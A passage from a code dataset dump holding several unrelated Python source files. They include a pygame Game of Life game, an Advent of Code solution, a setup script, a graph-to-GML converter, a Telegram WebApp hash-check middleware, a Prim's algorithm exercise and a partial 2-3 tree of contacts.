# player their extra turns\n if turn == \"Go Back\":\n self.Players[self.CurrentPlayer - 1].SpareTurns -= self.TurnsPerRound\n return False # The game has not ended (no-one won) so False is returned and player\n else: # loses those turns as they are given back when game is resumed\n board.impose_turns(turn, self.CurrentPlayer)\n self.Players[self.CurrentPlayer - 1].SpareTurns -= len(turn[1])\n screen.fill(self.Colour[\"Background\"])\n board.draw(screen)\n if turn[0] is not None:\n self.Gens += 1\n if self.CurrentPlayer == self.NoOfPlayers:\n self.CurrentPlayer = 1\n self.Turns += 1\n else:\n self.CurrentPlayer += 1\n win = self.check_for_wins(board, self.Turns, self.Gens)\n fps_limiter.tick(config.FPS)\n if win is not None: # If someone won\n if win[0].startswith(\"T\"):\n win_message = \"Turn limit reached.Player \" + str(win[1]) + \" wins!\"\n elif win[0].startswith(\"G\"):\n win_message = \"Generation limit reached.Player \" + str(win[1]) + \" wins!\"\n elif win[0].startswith(\"S\"):\n win_message = \"Player \" + str(win[1]) + \" got enough points to win!\"\n else:\n win_message = \"Player \" + str(win[1]) +\\\n \" got more cells than the other player by enough to win\"\n pygame.draw.rect(screen, (self.Colour[\"Highlighter\"]), # Draws the frame\n ((screen.get_width() - self.WinMessageWidth)\n // 2 - self.ButtonBorderSize,\n (screen.get_height() - self.WinMessageHeight)\n // 2 - self.ButtonBorderSize,\n self.WinMessageWidth + 2 * self.ButtonBorderSize,\n self.WinMessageHeight + 2 * self.ButtonBorderSize))\n pygame.draw.rect(screen, (self.Colour[\"Background\"]), # Draws the background\n ((screen.get_width() - self.WinMessageWidth) // 2,\n (screen.get_height() - self.WinMessageHeight) // 2,\n self.WinMessageWidth, self.WinMessageHeight))\n write(screen, screen.get_width() // 2, screen.get_height() // 2, win_message,\n self.Colour[\"Text\"], self.TextSize, max_len=self.WinMessageWidth,\n alignment=(\"centre\", \"centre\")) # Writes the win message\n pygame.display.update()\n board_view = False # when ESC is pressed the win message should disappear and\n while True: # the board should be displayed again\n if check_quit(pygame.event.get()): # if ESC is pressed - first press displays\n if board_view: # the board, the second goes back to the main menu\n self.Started = False\n return True\n else:\n board_view = True\n screen.fill(self.Colour[\"Background\"])\n board.draw(screen)\n self.draw_right_column(screen, self.get_player_scores(board),\n (False, False), (0, 0, 0, 0), 0, clickable=False)\n pygame.display.update()\n fps_limiter.tick(config.FPS)\n \n def take_turn(self, screen, board, player_no):\n \"\"\"returns the turn that the player wants to do\"\"\"\n board.draw(screen)\n turn = [None, []] # First value is where the Generation happens, if at all;\n turn_chosen = False # the second is a list containing info about the turns\n held_down = {\"mouse0\": True, \"mouse2\": False, \"esc\": False,\n \"space\": True, \"f\": False, \"j\": False}\n show_future = True\n show_alive_for = False\n turns_used = [0 for _ in range(self.NoOfPlayers)]\n fps_limiter = pygame.time.Clock()\n while not turn_chosen:\n events = pygame.event.get()\n if check_quit(events) and not held_down[\"esc\"]: # if ESC pressed but wasn't last turn\n if len(turn[1]) == 0 and turn[0] is None:\n return \"Go Back\"\n else:\n if turn[0] == len(turn[1]): # if the generation needs to be undone\n turn[0] = None\n else:\n t = turn[1][-1]\n del turn[1][-1] # Gives back the turns used to make the turn\n turns_used[player_no - 1]\\\n -= self.check_turn_is_valid(board, turn, player_no, t[0], t[1], t[2],\n self.FullImmuneKill)[1]\n held_down[\"esc\"] = True\n else:\n held_down[\"esc\"] = False\n x, y = pygame.mouse.get_pos()\n a, b = board.get_square(x, y)\n if 0 <= a < board.Width + board.Cushion and 0 <= b < board.Height + board.Cushion:\n kill = None # if on the board check if anything needs adding to turn\n if not (held_down[\"mouse0\"] or held_down[\"mouse2\"])\\\n and self.Players[player_no - 1].SpareTurns > turns_used[player_no - 1]:\n if pygame.mouse.get_pressed()[0]:\n turn_validation =\\\n self.check_turn_is_valid(board, turn, player_no, a, b, False,\n self.Players[player_no - 1].SpareTurns\n - turns_used[player_no - 1])\n if turn_validation[0]:\n kill = False\n elif pygame.mouse.get_pressed()[2]:\n turn_validation =\\\n self.check_turn_is_valid(board, turn, player_no, a, b, True,\n self.Players[player_no - 1].SpareTurns\n - turns_used[player_no - 1])\n if turn_validation[0]:\n kill = True\n if kill is not None: # If the turn was valid\n turn[1].append([a, b, kill])\n turns_used[player_no - 1] += turn_validation[1]\n if pygame.key.get_pressed()[pygame.K_SPACE] and not held_down[\"space\"]:\n turn_chosen = True\n if pygame.key.get_pressed()[pygame.K_f] and not held_down[\"f\"]:\n show_future = not show_future\n show_alive_for = False\n if pygame.key.get_pressed()[pygame.K_j] and not held_down[\"j\"]:\n show_alive_for = not show_alive_for\n show_future = False\n on_button = [False, False] # checks whether the mouse is on either button\n if 2 * self.ButtonBorderSize < screen.get_width()\\\n - x < self.RightColumnSize - 2 * self.ButtonBorderSize:\n if 0 < screen.get_height() - y - self.ButtonBorderSize < self.ButtonHeight:\n if pygame.mouse.get_pressed()[0] and not held_down[\"mouse0\"]:\n turn_chosen = True\n on_button[0] = True\n elif 0 > y - screen.get_height() + 3 * self.ButtonBorderSize\\\n + self.ButtonHeight > -self.ButtonHeight:\n if pygame.mouse.get_pressed()[0] and turn[0] is None:\n turn[0] = len(turn[1])\n on_button[1] = True\n \n self.draw_right_column(screen, self.get_player_scores(board, turns=turn,\n player_no=player_no), on_button,\n turns_used, not turn[0] is None, update=False)\n if show_alive_for:\n board.show_alive(screen, self.TextSize, self.Colour, turn, player_no)\n else:\n board.show_future(screen, turn, player_no, smaller=show_future)\n held_down[\"mouse0\"] = pygame.mouse.get_pressed()[0]\n held_down[\"mouse2\"] = pygame.mouse.get_pressed()[2]\n for key in ((\"space\", \"SPACE\"), (\"f\", \"f\"), (\"j\", \"j\")): # Updates held_down dictionary\n held_down[key[0]] = eval(\"pygame.key.get_pressed()[pygame.K_%s]\" % key[1])\n pygame.display.update()\n fps_limiter.tick(config.FPS)\n return turn\n \n def check_turn_is_valid(self, board, turns, player_no, a, b, kill, turns_left):\n \"\"\"Checks that the turn is valid; returns [bool, int] - bool is whether the move was valid,\n int is how many turns that move should take\"\"\"\n temp_board = copy.deepcopy(board) # Creates a copy of the board to make undoing moves\n temp_board.impose_turns(turns, player_no) # easier - original board isn't changed\n if temp_board.Cell[a][b].CurrentPlayer == player_no:\n return kill, 1\n elif temp_board.Cell[a][b].CurrentState == Dead:\n return not kill, 1\n else:\n if temp_board.Cell[a][b].FullImmune:\n if turns_left >= self.FullImmuneKill:\n return kill, self.FullImmuneKill\n else:\n return False, 1\n elif temp_board.Cell[a][b].PartImmune:\n if turns_left >= self.PartImmuneKill:\n return kill, self.PartImmuneKill\n else:\n return False, 1\n else:\n return kill, 1\n \n def get_player_scores(self, board, turns=None, player_no=0):\n \"\"\"Returns how many cells each player has on the board;\n includes total amount of dead cells (first value)\"\"\"\n player_scores = [0 for _ in range(self.NoOfPlayers + 1)]\n if turns is None:\n for a in range(self.Width):\n for b in range(self.Height):\n player_scores[board.Cell[a][b].CurrentPlayer] += 1\n else:\n temp_board = copy.deepcopy(board)\n temp_board.impose_turns(turns, player_no)\n for a in range(self.Width):\n for b in range(self.Height):\n player_scores[temp_board.Cell[a][b].CurrentPlayer] += 1\n return player_scores\n \n def draw_right_column(self, screen, player_scores, on_button, turns_used, generated,\n clickable=None, update=True):\n \"\"\"Draws the column on the right hand side of the screen\"\"\"\n pygame.draw.rect(screen, self.Colour[\"Background\"],\n (screen.get_width() - self.RightColumnSize, 0,\n self.RightColumnSize, screen.get_height()))\n # Erases the last drawing of the column\n write(screen, screen.get_width() - self.RightColumnSize // 2, self.ButtonBorderSize,\n self.PlayerNames[self.CurrentPlayer - 1] + \"'s turn\",\n self.Colour[\"Player\" + str(self.CurrentPlayer)], self.TextSize,\n max_len=self.RightColumnSize, alignment=(\"centre\", \"top\"))\n button_centres = [[screen.get_width() - self.RightColumnSize // 2,\n screen.get_height() - 2 * self.ButtonBorderSize - self.ButtonHeight // 2\n - a * (self.ButtonHeight + 2 * self.ButtonBorderSize)] for a in range(2)]\n for a in range(2): # draws the buttons\n pygame.draw.rect(screen, self.Colour[\"ButtonBorder\"],\n (button_centres[a][0] - self.RightColumnSize // 2\n + self.ButtonBorderSize,\n button_centres[a][1] - self.ButtonHeight // 2 + self.ButtonBorderSize,\n self.RightColumnSize - 2 * self.ButtonBorderSize, self.ButtonHeight))\n pygame.draw.rect(screen, self.Colour[\"Background\"],\n (button_centres[a][0] - self.RightColumnSize // 2\n + 2 * self.ButtonBorderSize,\n button_centres[a][1] - self.ButtonHeight // 2\n + 2 * self.ButtonBorderSize,\n self.RightColumnSize - 4 * self.ButtonBorderSize,\n self.ButtonHeight - self.ButtonBorderSize - 2))\n if clickable is None: # gets the colour of the text in the buttons\n button_colours = [self.Colour[\"Text\"] for _ in range(2)]\n if on_button[0]:\n button_colours[0] = self.Colour[\"Highlighter\"]\n if generated:\n button_colours[1] = self.Colour[\"Unselectable\"]\n else:\n if on_button[1]:\n button_colours[1] = self.Colour[\"Highlighter\"]\n else:\n button_colours = [self.Colour[\"Unselectable\"] for _ in range(2)]\n \n button_text = (\"End Turn\", \"Generate\")\n for a in range(2): # writes in the buttons\n write(screen, button_centres[a][0], button_centres[a][1], button_text[a],\n button_colours[a], self.TextSize, max_len=self.RightColumnSize,\n alignment=(\"centre\", \"centre\"))\n bottom = (screen.get_width() - self.RightColumnSize + self.ButtonBorderSize,\n button_centres[-1][1] - self.ButtonBorderSize - self.ButtonHeight // 2)\n extra_space = 0\n for n in [self.NoOfPlayers - a - 1 for a in range(self.NoOfPlayers)]: # writes in the\n col = self.Players[n].Colour # player information (bottom first)\n extra_space += 4 * self.ButtonBorderSize\n extra_space += write(screen, bottom[0], bottom[1] - extra_space,\n \"Spare Turns: \" + str(self.Players[n].SpareTurns - turns_used[n]),\n col, int(self.TextSize / 1.5),\n alignment=(\"left\", \"bottom\")) + 2 * self.ButtonBorderSize\n extra_space += write(screen, bottom[0], bottom[1] - extra_space,\n \"Cells: \" + str(player_scores[n + 1]), col,\n int(self.TextSize / 1.5),\n alignment=(\"left\", \"bottom\")) + 2 * self.ButtonBorderSize\n extra_space += write(screen, bottom[0], bottom[1] - extra_space, self.PlayerNames[n],\n col, int(self.TextSize / 1.2),\n max_len=self.RightColumnSize - 2 * self.ButtonBorderSize,\n alignment=(\"left\", \"bottom\"))\n if update:\n pygame.display.update()\n \n def check_for_wins(self, board, turns, generations):\n player_scores = self.get_player_scores(board)\n del player_scores[0]\n if self.IsTurnLimit and turns >= self.TurnLimit:\n return \"Turn Limit Reached\", player_scores.index(max(player_scores)) + 1\n if self.IsGenLimit and generations >= self.GenLimit:\n return \"Generation Limit Reached\", player_scores.index(max(player_scores)) + 1\n board_tot = self.Height * self.Width\n for a in range(len(player_scores)):\n if self.BoardAmountWin and player_scores[a] > board_tot * self.BoardAmount:\n return \"Board Amount Passed\", a + 1\n for b in range(len(player_scores)):\n if self.PlayerAmountWin and player_scores[a] * self.PlayerAmount > player_scores[b]:\n return \"Score Difference Passed\", a + 1\n \n\nclass Help:\n def __init__(self):\n self.SectionGapSize = config.H_SectionGapSize\n self.TextSize = config.H_TextSize\n self.TitleSize = config.H_TitleSize\n self.IndentSize = config.H_IndentSize\n self.SliderWidth = config.H_SliderWidth\n self.SliderGapSize = config.H_SliderGapSize\n self.SliderLength = config.H_SliderLength\n self.Width = config.H_Width\n self.Height = 600 # gets changed in the program depending on space taken up by help\n self.ScrollAmount = config.H_ScrollAmount\n self.Colour = config.H_Colour\n self.Surfaces = self.get_surfaces()\n \n def display(self, screen):\n \"\"\"Displays the help page on the given screen\"\"\"\n pygame.display.set_caption(\"Game of Life - Help\")\n pygame.display.set_mode((self.Width, self.Surfaces[0].get_height()))\n screen.fill(self.Colour[\"Background\"])\n self.Height = screen.get_height()\n slider_range = (self.SliderGapSize + self.SliderLength // 2,\n self.Height - self.SliderGapSize - self.SliderLength // 2)\n slider_centre = slider_range[0]\n help_rect = self.Surfaces[0].get_rect() # initialises the help surface to be written\n help_rect.topleft = (self.SectionGapSize, self.SectionGapSize)\n screen.blit(self.Surfaces[0], help_rect) # puts help surface onto the screen\n self.draw(screen, self.Surfaces[1], slider_centre, slider_range)\n slider_last_turn = False\n fps_limiter = pygame.time.Clock()\n while True:\n events = pygame.event.get()\n if check_quit(events):\n break\n x, y = pygame.mouse.get_pos()\n if pygame.mouse.get_pressed()[0]:\n if slider_last_turn:\n y = max(min(y + slider_centre - mouse_start, slider_range[1]), slider_range[0])\n self.draw(screen, self.Surfaces[1], y, slider_range)\n elif -2 * self.SliderGapSize - self.SliderWidth < x - self.Width < 0:\n slider_last_turn = True\n mouse_start = y\n if not slider_centre - self.SliderLength / 2 <\\\n y < slider_centre + self.SliderLength / 2: # if mouse was not clicked\n slider_centre = y # directly on top of the slider\n elif slider_last_turn:\n slider_last_turn = False\n slider_centre += y - mouse_start # reset the position of the slider\n if x > (self.Width - self.SliderWidth - self.SectionGapSize) / 2 - self.SliderGapSize:\n draw = False\n for e in events:\n if e.type == pygame.MOUSEBUTTONDOWN:\n if e.button == 4: # if scrolled down\n slider_centre = max(slider_centre - self.ScrollAmount, slider_range[0])\n draw = True\n if e.button == 5: # if scrolled up\n slider_centre = min(slider_centre + self.ScrollAmount, slider_range[1])\n draw = True\n if draw:\n self.draw(screen, self.Surfaces[1], slider_centre, slider_range)\n pygame.display.update()\n fps_limiter.tick(config.FPS)\n \n def draw(self, screen, help_surface, slider_centre, slider_range):\n \"\"\"Draws the right hand side bit of text & slider at given levels\"\"\"\n pygame.draw.rect(screen, self.Colour[\"Background\"], # draws over changing part of screen\n ((self.Width - self.SliderWidth - self.SectionGapSize)\n // 2 - self.SliderGapSize, 0, self.Width, self.Height))\n pygame.draw.rect(screen, self.Colour[\"Slider\"], # draws slider\n (self.Width - self.SliderGapSize - self.SliderWidth,\n slider_centre - self.SliderLength // 2,\n self.SliderWidth, self.SliderLength))\n help_rect = help_surface.get_rect()\n text_range = (self.SectionGapSize, help_surface.get_height()\n - self.Height + 2 * self.SectionGapSize)\n top_y = text_range[0] - (text_range[1] - text_range[0]) * (slider_centre - slider_range[0])\\\n // (slider_range[1] - slider_range[0]) # where the help surface is\n help_rect.topleft = (int((self.Width - self.SliderWidth) // 2) + self.SliderGapSize, top_y)\n screen.blit(help_surface, help_rect)# sets position of help surface in relation to the screen\n pygame.display.update()\n \n def get_surfaces(self):\n \"\"\"Gets the surfaces for the help screen. this needs to only be called once,\n and the surfaces saved to a variable, as it takes a while to run\"\"\"\n text = open(\"help.txt\").read().split(\"++\") # split into the two sections\n for section in range(len(text)):\n text[section] = text[section].split(\"\\n\") # splits into lines\n help_surfaces = []\n \n for section in text:\n extra = 0 # first time is to see how big the surface must be to fit the text,\n for _ in range(2): # the second time it writes it onto a surface of that size\n help_surface = pygame.Surface(((self.Width - self.SliderWidth)\n // 2 - self.SectionGapSize - self.SliderGapSize,\n extra))\n help_surface.fill(self.Colour[\"Background\"])\n extra = 0\n for line in section:\n if line.startswith(\"**\"): # bold text - titles etc.\n size = self.TitleSize\n line = line[2:]\n else:\n size = self.TextSize\n indent = 0\n while line.startswith(\"--\"): # indented text\n indent += 1\n line = line[2:]\n extra += write(help_surface, indent * self.IndentSize, extra, line,\n self.Colour[\"Text\"], size,\n max_len=help_surface.get_width()\n - indent * self.IndentSize) + self.SectionGapSize\n help_surfaces.append(help_surface)\n return help_surfaces\n\n\ndef write(screen, x, y, text, colour, size, max_len=None, gap=0, font=Font, rotate=0,\n alignment=(\"left\", \"top\")):\n \"\"\"Puts text onto the screen at point x,y. the alignment variable, if used, can take first value\n \"left\\\", \\\"centre\\\" or \\\"right\\\" and the second value can be \\\"top\\\", \\\"centre\\\" or \\\"bottom\\\".\n Note that these values relate to x and y respectively whatever the rotation, which is in degrees\n Max_len allows you to wrap a line if it becomes too long; the text will be restricted to being\n that many pixels long, and if it gets longer a new line will be started\"\"\"\n font_obj = pygame.font.SysFont(font, size)\n if text == \"\": # if it's a blank line\n line = 1\n extra_space = size\n else:\n line = 0\n extra_space = 0\n while len(text.split()) > 0: # while there is still text that hasn't been written\n line += 1\n msg_surface_obj = pygame.transform.rotate(font_obj.render(text, False, colour), rotate)\n used = len(text.split()) # the amount of text not used so far - uses less until it fits\n while max_len is not None and msg_surface_obj.get_width() > max_len: # within limits, if\n used -= 1 # any, then starts a new line and does it again\n msg_surface_obj = pygame.transform.rotate(font_obj.render(\" \".join(text.split()[:used]),\n False, colour), rotate)\n msg_rect_obj = msg_surface_obj.get_rect()\n a, b = msg_surface_obj.get_size()\n if alignment[0] == \"centre\":\n new_x = x - a // 2\n elif alignment[0] == \"right\":\n new_x = x - a\n else:\n new_x = x\n if alignment[1] == \"centre\":\n new_y = y - b // 2\n elif alignment[1] == \"bottom\":\n new_y = y - b\n else:\n new_y = y\n msg_rect_obj.topleft = (new_x, new_y) # where the two objects will be merged\n screen.blit(msg_surface_obj, msg_rect_obj) # merges them\n y += msg_surface_obj.get_height() + gap\n extra_space += msg_surface_obj.get_height() + gap\n text = \" \".join(text.split()[used:]) # deletes text used - it has been written,\n return extra_space # and is no longer needed\n\n\ndef check_quit(events):\n \"\"\"Checks whether the player tried to quit the game.\n Returns a boolean corresponding to whether the ESC key was pressed.\"\"\"\n for event in events:\n if event.type == pygame.QUIT:\n quit_game()\n if pygame.key.get_pressed()[pygame.K_ESCAPE]:\n return True\n return False\n\n\ndef quit_game():\n \"\"\"Quits the game\"\"\"\n pygame.quit()\n import sys\n sys.exit(0)\n","repo_name":"JosephLGibson/Game-of-Game-of-Life","sub_path":"set_up.py","file_name":"set_up.py","file_ext":"py","file_size_in_byte":40655,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"70227367553","text":"import os\n\ndef getTurnValue(turn):\n if turn == 'A' or turn == 'X':\n return 1\n elif turn == 'B' or turn == 'Y':\n return 2\n elif turn == 'C' or turn == 'Z':\n return 3\n else:\n return 0\n\ndef processInputPart1(fileName):\n\n countRounds= 0\n scoresPlayer1 = []\n scoresPlayer2 = []\n\n file = open(fileName, \"r\")\n\n if os.path.getsize(fileName) > 0:\n\n for line in file:\n\n countRounds += 1\n line = line.rstrip()\n (turnPlayer1, turnPlayer2) = line.split(\" \")\n\n roundScorePlayer1 = getTurnValue(turnPlayer1)\n roundScorePlayer2 = getTurnValue(turnPlayer2)\n\n if getTurnValue(turnPlayer1) - getTurnValue(turnPlayer2) == -2:\n roundScorePlayer1 += 6\n elif getTurnValue(turnPlayer1) - getTurnValue(turnPlayer2) == -1:\n roundScorePlayer2 += 6\n elif getTurnValue(turnPlayer1) - getTurnValue(turnPlayer2) == 0:\n roundScorePlayer1 += 3\n roundScorePlayer2 += 3\n elif getTurnValue(turnPlayer1) - getTurnValue(turnPlayer2) == 1:\n roundScorePlayer1 += 6\n elif getTurnValue(turnPlayer1) - getTurnValue(turnPlayer2) == 2:\n roundScorePlayer2 += 6\n\n scoresPlayer1.append(roundScorePlayer1)\n scoresPlayer2.append(roundScorePlayer2)\n\n scorePlayer1 = sum(scoresPlayer1)\n scorePlayer2 = sum(scoresPlayer2)\n\n print(\"PART 1\")\n print(f\" Score Elf : {scorePlayer1}\")\n print(f\" Score Me : {scorePlayer2}\")\n\ndef processInputPart2(fileName):\n\n matrix = {1: {'X': 3, 'Y': 1, 'Z': 2},\n 2: {'X': 1, 'Y': 2, 'Z': 3},\n 3: {'X': 2, 'Y': 3, 'Z': 1}}\n\n countRounds= 0\n scoresPlayer1 = []\n scoresPlayer2 = []\n\n file = open(fileName, \"r\")\n\n if os.path.getsize(fileName) > 0:\n\n for line in file:\n\n countRounds += 1\n line = line.rstrip()\n (turnPlayer1, turnPlayer2) = line.split(\" \")\n\n roundScorePlayer1 = getTurnValue(turnPlayer1)\n roundScorePlayer2 = matrix[roundScorePlayer1][turnPlayer2]\n\n if roundScorePlayer1 - roundScorePlayer2 == -2:\n roundScorePlayer1 += 6\n elif roundScorePlayer1 - roundScorePlayer2 == -1:\n roundScorePlayer2 += 6\n elif roundScorePlayer1 - roundScorePlayer2 == 0:\n roundScorePlayer1 += 3\n roundScorePlayer2 += 3\n elif roundScorePlayer1 - roundScorePlayer2 == 1:\n roundScorePlayer1 += 6\n elif roundScorePlayer1 - roundScorePlayer2 == 2:\n roundScorePlayer2 += 6\n\n scoresPlayer1.append(roundScorePlayer1)\n scoresPlayer2.append(roundScorePlayer2)\n\n scorePlayer1 = sum(scoresPlayer1)\n scorePlayer2 = sum(scoresPlayer2)\n\n print(\"PART 2\")\n print(f\" Score Elf : {scorePlayer1}\")\n print(f\" Score Me : {scorePlayer2}\")\n\ndef main():\n\n processInputPart1(\"input.txt\")\n processInputPart2(\"input.txt\")\nif __name__ == \"__main__\":\n main()","repo_name":"fschryvers/Advent-of-Code-2022","sub_path":"Day 02/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29820765816","text":"\"\"\"Setup module of the package.\"\"\"\nimport uuid\n\n__author__ = 'Matthieu Gouel '\nfrom setuptools import setup, find_packages\nfrom pip.req import parse_requirements\n\n\nINSTALL_REQS = parse_requirements('requirements.txt', session=uuid.uuid1())\nREQS = [str(ir.req) for ir in INSTALL_REQS]\n\nsetup(\n name=\"api\",\n version=\"0.1.0\",\n packages=find_packages(),\n author=\"Matthieu Gouel\",\n author_email=\"matthieu.gouel@gmail.com\",\n description=\"api for Python3 projects\",\n classifiers=[\n 'Topic :: Utilities',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n 'Operating System :: POSIX :: Linux',\n 'Operating System :: MacOS',\n ],\n url=\"\",\n include_package_data=True,\n install_requires=REQS\n)\n","repo_name":"matthieugouel/python-flask-celery-example","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"60"} +{"seq_id":"14377839126","text":"#!/usr/bin/python3\n\n# Takes in an edgelist and corresponding communities, and\n# outputs a gml file to be read by, for example, Gephi\n\n## For example, when I create plots, I read the gml file into\n## Gephi, color by community using the Partition->Nodes tab,\n## layout using ForceAtlas2, and then tweaking parameters\n## and manually dragging nodes around\n\nimport networkx as nx\nimport numpy as np\nimport sys\nfrom random import random\nfrom optparse import OptionParser\n\n# gives gml strings for nodes\ndef node_to_str(name, comm, size, proportional_size=False):\n if proportional_size:\n size = size*.7\n else:\n size = 20\n\n ret = 'node\\n[\\nid %d\\ncomm %d\\ngraphics\\n[\\nw %f\\n'%(name, comm, size)\n ret += ']\\n]\\n'\n return ret\n\ndef combine(edgelist, comms, out_file, proportional_size):\n G = nx.read_edgelist(edgelist, nodetype = int, data=(('weight',float),))\n\n # get the community for each vertex, taken as the max weight in each line\n comm_list = []\n for l in open(comms):\n split = list(map(float,l.split()))\n comm_list.append((np.argmax(split), max(split)))\n '''\n try:\n print(np.argmax(split), max(split))\n except Exception:\n print(l)\n '''\n\n #output the graph file\n out = open(out_file, 'w+')\n out.write('graph\\n[\\ndirected 0\\n')\n\n # first write nodes and their communities\n for n in G.nodes():\n out.write(node_to_str(n, comm_list[n][0], comm_list[n][1], proportional_size))\n\n # then write the edges\n for e in G.edges(data=True):\n if len(e) == 3 and 'weight' in e[2]:\n out.write('edge\\n[\\nsource %d\\ntarget %d\\nweight %f\\n]\\n'%(e[0],e[1],e[2]['weight']))\n else:\n out.write('edge\\n[\\nsource %d\\ntarget %d\\n\\n]\\n'%(e[0],e[1]))\n\n out.write(']')\n\nif __name__ == '__main__':\n # parse command line options\n parser = OptionParser()\n parser.add_option('-i', type=str, dest = 'edgelist', help='input file edgelist', default='data/protein.edges')\n parser.add_option('-c', type=str, dest = 'comms', help='input communities (output from bp algorithm)', default='out/protein.out')\n parser.add_option('-o', type=str, dest = 'out_file', help='output file, containing vertices and their communities in gml format', default='out/protein.gml')\n parser.add_option('-s', action='store_true', dest='proportional_size', help='flag to make node size proportional to its community membership', default=False)\n\n (options, _) = parser.parse_args()\n\n combine(options.edgelist, options.comms, options.out_file, options.proportional_size)\n","repo_name":"nitramsivart/uncertain-networks","sub_path":"format_output.py","file_name":"format_output.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"60"} +{"seq_id":"40888450709","text":"from django.conf import settings\nfrom django.http import JsonResponse\nfrom urllib import parse\nimport hashlib\nimport hmac\nfrom .utils import get_telegram_data\n\n\nclass TelegramMiddleware:\n def __init__(self, get_response):\n self.get_response = get_response\n\n self.bot_token = settings.TELEGRAM_TOKEN\n\n\n def __call__(self, request):\n is_valid = False\n telegram_params = get_telegram_data(request)\n telegram_hash = telegram_params.pop('hash')\n\n if telegram_hash:\n telegram_keys = list(telegram_params.keys())\n telegram_keys.sort()\n\n telegram_check_row = \"\\n\".join([\n f'{key}={telegram_params[key]}' for key in telegram_keys\n ])\n secret_key = hmac.new(\"WebAppData\".encode(), self.bot_token.encode(), hashlib.sha256)\n result_hash = hmac.new(secret_key.digest(), telegram_check_row.encode(), hashlib.sha256).hexdigest()\n if result_hash == telegram_hash:\n is_valid = True\n\n\n\n if not is_valid:\n return JsonResponse({'error': 'unvalid hash'}, status=400)\n\n response = self.get_response(request)\n\n\n\n return response","repo_name":"alexanderaleskin/Telegram_web_app","sub_path":"drive_bot_web/web_api/telegram_middleware.py","file_name":"telegram_middleware.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18740015667","text":"import math\n\n# Euclidean distance\ndef euclid(x_1, y_1, x_2, y_2):\n return math.sqrt((x_1 - x_2)**2 + (y_1 - y_2)**2)\n\n# Prim's algorithm for total weight of minimum\n# spanning tree (i.e. length)\ndef prim(n, x, y):\n V = [False] * n \n Dist = [float('inf')] * n\n Dist[0] = 0\n\n d_total = 0\n\n for _ in range(n):\n d_min = float('inf')\n i_min = -1\n\n for i in range(n):\n if not V[i] and Dist[i] < d_min:\n d_min = Dist[i]\n i_min = i\n\n V[i_min] = True\n d_total += d_min\n\n for i in range(n):\n if not V[i]:\n d = euclid(x[i_min], y[i_min], x[i], y[i])\n Dist[i] = min(Dist[i], d)\n\n return d_total \n\nif __name__ == \"__main__\":\n num_cases = int(input())\n\n for i in range(num_cases):\n input()\n n = int(input())\n x = []; y = []\n\n for j in range(n):\n xj, yj = map(float, input().split())\n x.append(xj); y.append(yj)\n \n print(\"{:.2f}\".format(prim(n, x, y)))\n if i < num_cases - 1:\n print()\n","repo_name":"lvthnn/TOL607G","sub_path":"Vika9/freckles/freckles.py","file_name":"freckles.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"15941605901","text":"from ClaseContacto import *\nfrom faker import Faker\nfrom time import time\nclass Node:\n def __init__(self, value):\n self.data = [value]\n self.parent = None\n self.child = []\n\n def __str__(self):\n if self.parent:\n return str(self.parent.data) + \" : \" + str(self.data)\n return \"Root: \" + str(self.data)\n\n def _is_leaf(self):\n return len(self.child) == 0\n\n def _add(self, new_node):\n for child in new_node.child:\n child.parent = self\n self.data.extend(new_node.data)\n for x in range(0, len(self.data)):\n for j in range(x+1, len(self.data)):\n if self.data[j].apellido > self.data[x].apellido:\n self.data[j], self.data[x] = self.data[x], self.data[j]\n self.child.extend(new_node.child)\n if len(self.child) > 1:\n for x in range(0, len(self.child)):\n for i in range(0, len(self.child[x].data)):\n for j in range(x+1, len(self.child[x].data)):\n if self.child[x].data[j].apellido > self.child[x].data[i].apellido:\n self.child[x].data[j], self.child[x].data[i] = self.child[x].data[i], self.child[x].data[j]\n \n if len(self.data) > 2:\n self._split()\n\n # Encuentra el nodo correcto donde insertar el nuevo nodo\n def _insert(self, new_node):\n\n # Si es hoja, añade el dato a la hoja y hace un balanceo\n if self._is_leaf():\n self._add(new_node)\n\n # Si no es hoja, debe encontrar el hijo correcto para descender y hace una inserción recursiva\n elif new_node.data[0].apellido > self.data[-1].apellido:\n self.child[-1]._insert(new_node)\n else:\n for i in range(0, len(self.data)):\n if new_node.data[0].apellido < self.data[i].apellido:\n self.child[i]._insert(new_node)\n break\n\n # Cuando hay 3 items en el nodo, se divide en un nuevo sub-arbol y se añade al padre\n def _split(self):\n left_child = Node(self.data[0])\n right_child = Node(self.data[2])\n if self.child:\n \tself.child[0].parent = left_child\n \tself.child[1].parent = left_child\n \tself.child[2].parent = right_child\n \tself.child[3].parent = right_child\n \tleft_child.child = [self.child[0], self.child[1]]\n \tright_child.child = [self.child[2], self.child[3]]\n\n self.child = [left_child]\n self.child.append(right_child)\n self.data = [self.data[1]]\n\n # Ahora tenemos un nuevo sub-arbol, y necesitamos añadirlo a su nodo padre\n if self.parent:\n \tif self in self.parent.child:\n \t\tself.parent.child.remove(self)\n \tself.parent._add(self)\n else:\n \tleft_child.parent = self\n \tright_child.parent = self\n\t# Busca un item en el arbol y lo retorna siesque lo encuentra, en caso contrario retorna False\n\n def _find(self, apellido):\n \tfor i in self.data:\n if apellido in i.apellido:\n print(\"El contacto fue encontrado en la estructura\")\n return apellido\n \tif self._is_leaf():\n print(\"No se encontro el contacto\")\n \n return False\n \telif apellido > self.data[-1].apellido:\n \t\treturn self.child[-1]._find(apellido)\n \telse:\n \t\tfor i in range(len(self.data)):\n \t\t\tif apellido < self.data[i].apellido:\n \t\t\t\treturn self.child[i]._find(apellido)\n\n def _remove(self, apellido):\n \tpass\n\n\t# Imprime en pre-order\n def _preorder(self):\n \tfor i in self.data:\n print(i.Imprimir())\n \tfor child in self.child:\n child._preorder()\n \n\n\nclass 